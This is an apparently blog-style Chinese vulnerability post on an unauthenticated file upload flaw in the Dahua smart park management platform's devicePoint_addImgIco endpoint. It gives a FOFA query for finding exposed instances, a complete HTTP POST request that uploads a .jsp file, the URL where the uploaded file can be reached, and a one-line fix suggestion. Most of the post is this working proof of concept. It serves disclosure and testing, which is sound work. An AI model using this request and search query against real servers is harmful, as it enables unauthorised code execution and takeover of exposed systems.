Advertisement

大华智慧园区综合管理平台 devicePoint_addImgIco 文件上传漏洞

阅读量:

0x01 漏洞描述:

大华智慧园区综合管理平台devicePoint\_addImgIco未对用户上传的文件施加任何限制措施,这使得未经过身份验证的远程攻击者能够随意上传文件,并进而能够执行任意命令以获取服务器权限

0x02 搜索语句:

Fofa:body="/WPMS/asset/lib/normalize.css"

0x03 漏洞复现:

复制代码
 POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1

    
 Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
    
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
    
 Host: your-ip
    
 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    
 Content-Length: 243
    
 Connection: close
    
  
    
 --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
    
 Content-Disposition: form-data; name="upload"; filename="222.jsp"
    
 Content-Type: application/octet-stream
    
 Content-Transfer-Encoding: binary
    
  
    
 asd
    
 --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
    
    
    
    
    代码解释

按照上传路径拼接访问

复制代码
    http://your-ip/upload/emap/society_new/xxxxxx.jsp
    
    代码解释

0x04 修复建议:

关闭互联网暴露面或接口设置访问权限

全部评论 (0)

还没有任何评论哟~